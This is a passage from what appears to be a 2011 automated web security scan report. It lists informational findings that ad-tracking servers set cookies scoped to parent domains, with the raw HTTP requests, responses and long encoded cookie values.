yRCiDcaOr2NOlABeK5Qs9V1xN2Xbl9utsOZzninCy5NtTZjxkXDwJxXGvEdjxayqUPD/pJ9NK6E1dup/apyccF5E3TidzG4q/8bqos250kNmw1xYaJumj9mEqR4YSYnBANPhk+VzZcgjK0LcWf9TTLIfUjZB/p9sg5tH9jbnJmAD10ujoXfkvn0NUUoIDNzKtEcKq6SfjwwKgPxKFsvWtmBBij5xKGVtai3hvbxu+VPAob5D0mC23kZJhmgvS+JZO1Nlby9ytNQ8Nq1NIEHqsouw3MXa+LQwlVvk69Z3FAp1Urw5cq0R8Zzx1iEHDUQW2XLL+KtE4gzDXpUs43F/KzmwLcWNUld85lLv+Zs4+2SFI38K/UChrS/uhsXQ"; rsi_us_1000000="pUMV4ymnMBYY7dXKYa4+QIxDgvM/u/LBmb+24q2tXApJiFT0/ChXTUHNBmbDd46t2hFxDCMVaHP4CLq/pZMuoy/ewcD0FX/sKZKTRO7VZ6iPmAiSltSt2s1xurZiR6H24UqyA+Nh2RxjsZeCiFKkk80FLO19B2NlUVN7jrYLH0NcEDW/dc9rzfg7YbyYtEmGqNoKYa5yINjN6e64XwCx4D46jpq6oGI1IZqA3DT3sEnoRJjrPK5azHeuT4nS5vioYImIWn6v3MgSK/RzrDRuAJ9j91dfPNrNfMwdtaDxsR4w4lhnkcahqc2S0BIsn/oyUca/oeTJoQYbwJLsCkiNcMLywz7ZEwnFltdeQOuk1ywxzFOjbg6cfyoxSipYtVjffF7qgITHxcUPT68KNERXMGy+sRKFMQLmeTrdopWZ+1obDjU9/BEAlmJJDLfStO73D27JrDXhrV74uzGERS6h+diijLK75rsaUimseoXwgkl9f4+GeEKI+oEsL4cD/Er0Jg2xRn0TDMY/6HNdLWgdbMF0OTvjnpUeokDF6xcBZRb6ZkGzKTyP9KKrv9f4nmLcxgiwCcguTfu9whhbnlGGiH8sG0kXhP7cBJQprkfqHWxAV5/VukNuzc51qmMzHTKgS0vAwiMvaOSBzvr+LsGh0q5cCKXNbFxLpkQnCitO5j+EBFKWHBE1dbS3z/CiiumJtsDuLFny+6XTFHQx9un0UaEF3Hi4Cn6ZOHY5/DKYyrighviQF7pnMxn0AW0HC6YBeE0Z+48oX+gYVyfMi63VXQoke8h/7W2zU2vN6hMbuhSi/obO8bhOUxNgbfkz+vZwXvf6pPxDaZNxsBR+Clwg4vzXg+Uujg2VkfE1QOkdxCKQUvJiX8Gn5CEfkWDFAyIDkIvHrqZtMNrhyNcl98LTb346dAwOwysbzdoh72IBwFnMAeLBhOWXvCSQNlCmlGDNsOfLen2jioPuq5L0lOONkfTqB/g/KK5rR+9cfyZCtpaiCmMSdDpgHdUuCdCXBN/omF6OdlPGYeUcOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XvGDw6ajlb0l+l8bB/mvXv2SILU062vN9JU++IWvixYNTL9RUomOVux4EU2cJ2sLFszBVubsN1kPUduNKVVw2X0a6dXuhq4qoUW11T6Kyb7dO4m1AbBRrItbPKZi3KdVnQWKicY3QreXyXa7A9NQcvUkbOkE65wOLek+qqT0HDiWaheBzY+dX+jb12QkG3eyrMWDkxFEbzHnXSi+/DhGtr36p4KTjfKGl9Bs1WgN42NWJ2FniUaeyiDvYXQ8ypkErggFNtDtcnjbPQ+h83ld+1XqRT3lTbbXfEOEy39JI3wIVsCxJesH7MFrKtOMDpJXBianiJYXm1MLpOAYQ5M9mK/9rfnhk0VY+Qf8s7QPXBFje+NPjRkGFrocHy4UDzXaW2+2hBDvcOrnJbsgcUe4i/oLDVcOpsxsmW8IS6OMYRkwPdmYgGL5YfRYEKjMsUbmy67Gc2dTg7Y9LTFVnADWyRnzAezIS+NW7wqLkXh4/OzXH9QQWqikfI6wpW9rOG7+vUd3Qoia1crbjTt+gSk2hvt+cVWSF2Fl3akOyZIZyuHBxrsClCfQgStQQmEiNaOXo9zDpzde90duK+NvVriCbGPj9EE7hhcxkgghiN6pIJ6OXaxkG/bXonImQXovRVDCk4kzDJ9VGH3cSj9+1zz8ZP32r48sxAhklxuKayLxCyMX8gmEZ+aHvMTkGDrKSD7FwzFnHyGJpXP1jJgrDSHoeaAkoAFW2UGq5hVOeJ"; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vLj+wWQEAWvERBw6jjPQ4L4Uubk0NaY9wI2qrKXBEJqalRFyzz++kuS0t8FA35bmxx0VW/Jj5TEabtOAJFHV+aNKdWI3SWQJ9jz0Bw9jAtbfMu/qQH+JwD1NWyRhr+2kr+wlN2b1z5lAdiCkUa0tKYvCvYcqJvNr2DqBzL0LgZXnZiFpr9375ifqe1pBlZ259HXaBJ50bcPs5W6UrbuxwwykkmBfvTGdhY6R36hDP9GcRo3IMQKLboYAZUAD6b705sfN2AyaDbgmLf3ZERjZTjw5bBLQ9fbKsIhBlYFUM4XFud47GCjJTwGuwc1LM95tG5AFzx9tnwsgvVNaovbwq2L9N/YKANEQv8X2qIyy+X6kp2cftNCti8OnGgKDOj8KjUySG9pekHu4As1aZJIbEGxWjO+KA6xjX9kaVSObtWvl8I9hp4IH7INgoU0uq+mPXynexYaV+bmSiifClg+RGshM2vhG0UyUpJ0UynUzma61vniue1+wkfmg3et6cr2sqzQSRUj1pHr2rWAZQJDaflpCOk=; rtc_AhSj=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
If-Modified-Since: Tue, 14 Jun 2011 00:13:54 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBZs66O2VJ8nVhNNNA7LZsKuuAdRuhry5GdSvQAU1GrEi6UrT031s4JkwQXEb8iMDPHlQXvF2uv5OIusuoi2sbvsqxUqk1VHa83DvyOqZvgWqVxmcWIamC8nXWAIxqsezSe9oa5Vy/39rYVS1FgBxQvTCIiMa+1j8IL4+DjF7YsXO0HH0P2m2BTTsqddAWCMGLPLh+9Cs9xqVbfqx7zH1UcAcqLfUKR70nAS6SB+1Mh0bs5npya/B4+7GDnx8HBkvUi+ouzwsZmH0fQIXYZ5ZcsMxeA+iWTJiRwNpXgkDESmSMqOEZF59Ut9jwiQU11yXCG8iFmI2XUdPD0H8ErsVwgA9biYW5Yj3NVVCkvoEaq43d16SUggpvN8g/AFXH15SbwW7X9gjbPGS9RIENjX6rn9tQMgTqBUTiqF16lrWksHSvZqvitgEQSz3RWRhZBIdzIiqo4/JObC7ZHHBzgvGV/OgaatwL0I0OTsTQqkcyonrPn7KuBJ6I1XFRCgHp4dLUVnHL6uJVK1GTCxQfuuXlrQKXUFuef2oQMC8EYT57CseI2qqj9oxzUSU5ywdq4HoeLXnUO8eYXAY53K1pk5HZtpJ+v00a6NY+CsVg7bLaPy/d2DpcEJFWPqMnlti4nmKcrgKdxUBx/kK9iokVycpba8A/2rez9ysp/+AyFOD1FTgfGzaXlR5ruBZt86DBa4C81/AGN8KKoSigo7EovtmqRc3N0JF8EFYFOKigdpyYtQaoowobd8Rroom9yZ2LHSRJxryuWonCs3lsDwHnMMnjM1eXX8T0PrzQogtKydVuWTdGAIs28/W1jJOqA8JukiohsPhNhmelK4zWXHCr+sIOb9MSIe7t8zo2wsA3Oa1L++Xy8vQHbc+gZSvjKaIBdqoq8+4h5Hbk4nV2bX9HHyoUVGZqXawGuQLDyjLdWy4IeDra0J3uKuS9pPwIsigk/Pxfzj5rxyVDvwfLvBEjwcENcKRMTjiJnlQTQ7HIk3OkhZWQLD+ANAbGec6CQkywZ0ZGs0xSOWq8c3M3wd4HVwbqvfguMbjWwqWPEhOIeKf30NqRKhrmUnw/FklhU+qb67/ZUArmuo1UqXBEY+He0Ddh9j19YLh5AUJqa8a7pECW2xwiDzd4kZcs0qizk2lFijcP1fCQ6Azo7mx9hrba4+LZ/pE4vbfPSSvVVdWH07GR24Vw53yUvTfyra9ld5weXosVyVsa+AZYYAnVicha4hTRKyFfJD9dV6uLKI3FIBpJTsYzqHpIIvfpO4WXe0Nvo0HXgWikO2safFF2xECLaSEgk8QYc0uBVmy3lHR3SKCeGRx4S0xKCdHlbbY7cNMryPWK771UVOGSQpjoLyvm3/uFXZvd6QE8fkxEuJ9SzbrrOQxSWC4avatQ17yMlYzj+l9+rVEqQNUYc4lrNZVAaTdUyIyY99yoNuAyx9sqFaQw3tzvE1dzRUXprIhlbOwLtkSTuMNJzIlxtpOEMHmZrsyHxDJldOymIcSEAikUgk3wN9vp6O7gelgk3x581ZUT7Htb1tASL4XJh1P8lc8yvfgx773aOBJvbuFs+vu1XaE85OCKKmkLkgABwiaNW6h2qHai5o8W+h1i8kBw4D/8fpLGhFE5ObkFCwLlo2Nh58cjpMBai3a2SC75wIjc0XlZGXet2KAkdt9w/6KF4AAbPiVaDb8HX5LOQMzfk1mCXsJd2a/D2t0InE4Y/UHMiQHFSctcrNuS9u57VHqfpJtPnAAFm+p+QgzKIngJb+TMyIy9OrgWMDYF5mYTdV+gSxfrVo7MepKYjVxewZSUXpZIPC6wOhpPUBa3iNIeUpY8H8Ti5KJZfpNYNdYa2U5f5n9CeXcEQTjBndgqQNcnmGQn4sn; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:20 GMT; Path=/
Last-Modified: Thu, 16 Jun 2011 11:22:20 GMT
Cache-Control: max-age=3600, private
Expires: Thu, 16 Jun 2011 12:22:20 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 11:22:20 GMT
Content-Length: 6002

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07608';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

10.67. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=BBg+NFJwHob0Fn7sIWwJoaMntKPCC0nBwJpwEg02FYNBdbdBWTwihXg1EwjmGYNBxGeBWTAQvag1EQW4FYNBLppBWTQghXg1EgN5FYNB6ijBWTAmhXg1EAY4FYNBdDmBWTA/yag1EAVZGYNBYimBWTA3Wag1EQY4FYNBFGeBWTAxBag1EU1aGYNBbTeBWTQwBag1EYnXGYNBWGoBWTgQvag1EogmGYNBxmpBWTQRgag1E0soGYNB8mpBWDrnA8ekGmQkBAAoNXcCmZOiGSKtyBw2saYCNSPC73cBu1KaAwzgGSvr5DwxaaI9CQ4kGFtt4Kgq4aYCzamAjSqRRPLUCsEpGFdpFDw09YMFvCBB3hoxVC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:08:17 GMT; path=/
GUID=MTMwODIyOTY5NzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Sat, 15-Jun-2013 13:08:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=48498_NDM_cs=2&betq=11762=425218 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; GUID=MTMwODAxMDQ0NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=1Yf+NFJwHob0Fv7sIWwJoasntKfBC0nxeKpwEg02FgNBdbdBYTwihXA2EwjmGgNBxGeBYTAQvaA2EQW4FgNBLppBYTQghXA2EgN5FgNB6ijBYTAmhXA2EAY4FgNBdDmBYTA/yaA2EAVZGgNBYimBYTA3WaA2EQY4FgNBFGeBYTAxBaA2EU1aGgNBbTeBYTQwBaA2EYnXGgNBWGoBYTgQvaA2EogmGgNBxmpBYTQRgaA2E0soGgNB8mpBYDrnA8ekGuQkBAAoNX8CmZOiGaKtyBw2sa4CNSPC73cBw1KaAwzgGavr5Dwxaao9CQ4kGNtt4Kgq4a4CzamAjSqRTPLUCsEpGNdpFDw09YsFvCBB3hoxXC; F1=BUj953EBAAAABAAAAMAAUEA; BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; ROLL=U6APBje2RKFWN9uaB4l2AhxSqVDmeNF!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jun 2011 13:08:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=BBg+NFJwHob0Fn7sIWwJoaMntKPCC0nBwJpwEg02FYNBdbdBWTwihXg1EwjmGYNBxGeBWTAQvag1EQW4FYNBLppBWTQghXg1EgN5FYNB6ijBWTAmhXg1EAY4FYNBdDmBWTA/yag1EAVZGYNBYimBWTA3Wag1EQY4FYNBFGeBWTAxBag1EU1aGYNBbTeBWTQwBag1EYnXGYNBWGoBWTgQvag1EogmGYNBxmpBWTQRgag1E0soGYNB8mpBWDrnA8ekGmQkBAAoNXcCmZOiGSKtyBw2saYCNSPC73cBu1KaAwzgGSvr5DwxaaI9CQ4kGFtt4Kgq4aYCzamAjSqRRPLUCsEpGFdpFDw09YMFvCBB3hoxVC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:08:17 GMT; path=/
Set-Cookie: GUID=MTMwODIyOTY5NzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Sat, 15-Jun-2013 13:08:17 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Thu, 16 Jun 2011 14:08:17 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.68. http://map.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adh=1lluut6160b59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
clid=2ll77mm01171voofy6a0tk1w1on4k0214n020p0560f; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
rdrlst=4300pi2lluuxo000000164n020klzlluuxo000000164n020x1blluutb000000184n021918lmuv1k000000034n020e0dlluuxo000000164n020e0klluyhn0000000o4n020d6hll8nk2000000204n020mollluvl10000000w4n020e0rlluv11000000124n02007jlluutb02i2z0184n020w9wlluutb000000184n021196llkg950000001k4n021195llnepl09y6p01h4n020bnelm6ifs0000000a4n021194lljpq30ogm301l4n020bnhlm52500000000b4n0205grlmdlbx000000074n0201g3ll8nk20opc80204n020j4wllv8nq0000000k4n021908lmvu19000000024n021193llnesr0000001g4n021192lljn150dpv501m4n020moxlluvec0000000y4n020dt1lluvec0000000y4n0217xdlluutb000000184n02114qlluutb000000184n020e6mll9m030000001v4n020e6llluv7p000000104n020kmmlluw660000000s4n020kk3lluvm30000000u4n02159jlm523d0000000c4n020e5ylluvm30000000u4n020wgclluutb000000184n0212anlluuxo000000164n020wgmllxcud0000000j4n020gjzlluv7p000000104n020df3lluv11000000124n020m0tllv8gv0000000m4n020yc9lluv7p000000104n020wghllv8nq0000000k4n020yzxlluv11000000124n020gjqllv8nq0000000k4n02167alluuyr000000144n020m9illuuyr000000144n020wgrlm522h0000000d4n020m0jllyfqo0000000h4n02100xllo31q0000001e4n020obllluutb000000184n020ycqlluvl10000000w4n02166wlluv7p000000104n021015lluutb000000184n020ycmlluv11000000124n020klalluutb000000184n020na6llux090000000q4n020yzblluutb000000184n020spbll9m030000001v4n020dr8lluutb000000184n020ojulluuxo000000164n02101ellrto10000001d4n0214ozllneum0000001f4n0215ztll9l280000001w4n020pdmlluuxo000000164n02101mllrttq0000001c4n020yyslluuyr000000144n020n9qllxcud0000000j4n020m74lluyhn0000000o4n020m7elluvm30000000u4n02101ulluutb000000184n020lb4llux090000000q4n020zp7lluuxo000000164n020yy9lluvec0000000y4n020bq5lmivh8000000064n020860lm2xlp0000000g4n020caglluutb000000184n0208d4lm4som0000000f4n0200c6lluutb000000184n0210tyllkjwu0000001j4n020lb0lluvec0000000y4n0211z0lluuxo000000164n020njjlluyhn0000000o4n020lazlluuyr000000144n020msvll9m030nqw701v4n0210telle7v60j51401o4n0212enlluutb000000184n0210rdllikks0esbi01n4n020m3ullv8gv0000000m4n020wbqlluvm30000000u4n020m44lluw660000000s4n0212llllneum0000001f4n0212lmlluutb000000184n020mj8lluv11000000124n0210kylmivh8000000064n020ovullneum0000001f4n0212qnllkonl0000001i4n020kn9lluv7p000000104n020mjilluuyr000000144n020dvalluvl10000000w4n020g9zlluw660000000s4n02120bllneum0000001f4n0201hvll8nk20opc80204n0216iell9m030000001v4n020ga6llux090000000q4n0207vglluuyr000000144n020fclllv8gv0000000m4n020ph0lluutb000000184n0218h8lm51zz0000000e4n020o0ulluv11000000124n020e15lluvl10000000w4n02; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
sglst=2230s9eslluut6000000194n020p0560fef6lmq6u304o7h0014k000p00600armllnepl12s4i01d4j000p00600ey7lmq6u304o7h0014k000p006000ixlljn151b80f01m4n020p0560fefjlmq6u304o7h0044n020p04604dsolmq6u304o7h0044n020p04604bzvllikks1da6e01n4n020p0560fexulmq6u304o7h0014k000p00600dlell9l281l9zc01u4n020p0560fejelmq6u304o7h0044n020p04604e0vllnepl17gbz01g4n020p046044rylljn1516jsy01i4j000p00600aojlljn1516jsy01i4j000p006009uklljn151b80f01l4n020p0460490ill9m031m8r301v4n020p0560fbvdlljn151b80f01m4n020p0560f56blljn151b80f01j4k000p00600dz4lmq6u304o7h0044n020p046041jzll8nk21n7740204n020p0560fecwlmq6u304o7h0014k000p00600asqllnepl12s4i01d4j000p0060040ullkg9515qky01g4j000p006003a6lm51zz0qsr700e4n020p0560ebjflljn1516jsy01i4j000p006005l3lluv0y000000134n020p0560fecklmq6u304o7h0014k000p00600bjhllnepl12s4i01d4j000p0060061jllnepl12s4i01d4j000p00600f7xlmq6u304o7h0014k000p00600cwgllnepl12s4i01d4j000p00600ag2lle7v61hmw001o4n020p0560fbnwlle7v61byyx01k4j000p00600a6slljn151b80f01m4n020p0560fet0lmq6u304o7h0014k000p00600ekglmq6u304o7h0014k000p00600ehallnepl12s4i01d4j000p00600edxlmq6u304o7h0014k000p00600eh8lljn1516jsy01i4j000p00600b3zllnepl12s4i01d4j000p006009q5lljn1516jsy01i4j000p00600ehellnepl12s4i01d4j000p006005nkllnepl17gbz01h4n020p0560fbo0lle7v61byyx01f4j000p006009mkllnepl17gbz01g4n020p04604cwallnepl17gbz01h4n020p0560f3wjllnepl12s4i01d4j000p00600ekzlmq6u304o7h0044n020p04604bo8lle7v61gn6e01o4n020p0560fb3jlmivh80cz9y0064n020p05606690lle7v61byyx01k4j000p00600evalmq6u304o7h0014k000p00600ehslmq6u304o7h0044n020p04604719lle7v61byyx01f4j000p006009c9llnepl12s4i01d4j000p00600ebblmq6u304o7h0044n020p04604eyylmq6u304o7h0014k000p00600ef0lmq6u304o7h0014k000p00600eyvlmq6u304o7h0014k000p00600es4lmq6u304o7h0044n020p04604eerlljn1516jsy01i4j000p006009wvlljn151b80f01m4n020p0560febclle7v61byyx01k4j000p00600f1wlmq6u304o7h0044n020p04604eeplmq6u304o7h0044n020p046040tille7v61hmw001o4n020p0560fes0lmq6u304o7h0014k000p006004wcllnepl12s4i01d4j000p0060045mlluuyq000000154n020p0560f5mrlljn1516jsy01i4j000p006005jillnepl17gbz01g4n020p04604e0wlmq6u304o7h0014k000p00600ez9lmq6u304o7h0014k000p00600ee8lmq6u304o7h0044n020p046049gellnepl17gbz01h4n020p0560f; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
vstcnt=418b010r134me19103210k24ehss103210c24nwh0103210u24n5kn20pm10c203210024fw8l103210t24eu86218e10p203210s24fi35103210624sqj810321002453dh103210324ty31218e10i203210m24u1er218e200202203210324elor218e108203210a24k5jb10pn10c24mwjf103210m24gcxb103210c24rm27218e10820321082496o0218e100203210024f1fr103210c24ep9z118e10q24p056103210024q28r218e108203210g24fn0j103210324b47b103210624uz3i10pm10t24mtp410321002459ao103210324rcz8218e102203210624fu43103210c24wnrf103240220620820924ebm7103210k24qfys103210t24qqy7127p20020224vx8f127p10224ffmk103210024fank103210324dx7s103210m24tfmw1032100249ujm103210t2450o610321002; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3949&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227437416&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lmp2ts0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ll77mmxzt11nneyxzt11nneyxzt11nneyxzt11nneyxzt11nney; adh=1lluut6160b59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; clid=2ll77mm01171voofy6a0tk1w1omen0204n010p0460e; orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; rdrlst=4390pi2lluuxo000000154n010klzlluuxo000000154n010hsnlluutb000000174n010x1blluutb000000174n010e0dlluuxo000000154n011918lmuv1k000000024n010e0klluyhn0000000n4n010d6hll8nk20000001z4n010mollluvl10000000v4n01007jlluutb02i2z0174n010e0rlluv11000000114n010w9wlluutb000000174n011196llkg950000001j4n011195llnepl09y6p01g4n010bnelm6ifs000000094n011194lljpq30ogm301k4n010bnhlm52500000000a4n0105grlmdlbx000000064n0101g3ll8nk20opc801z4n010j4wllv8nq0000000j4n011908lmvu19000000014n011193llnesr0000001f4n011192lljn150dpv501l4n010moxlluvec0000000x4n010faelluuxo000000154n010dt1lluvec0000000x4n0117xdlluutb000000174n010e6mll9m030000001u4n01114qlluutb000000174n010e6llluv7p0000000z4n010kmmlluw660000000r4n010kk3lluvm30000000t4n01159jlm523d0000000b4n010e5ylluvm30000000t4n010wgclluutb000000174n0112anlluuxo000000154n010gjzlluv7p0000000z4n010wgmllxcud0000000i4n010m0tllv8gv0000000l4n010df3lluv11000000114n010yc9lluv7p0000000z4n010yzxlluv11000000114n010wghllv8nq0000000j4n010gjqllv8nq0000000j4n01167alluuyr000000134n010m9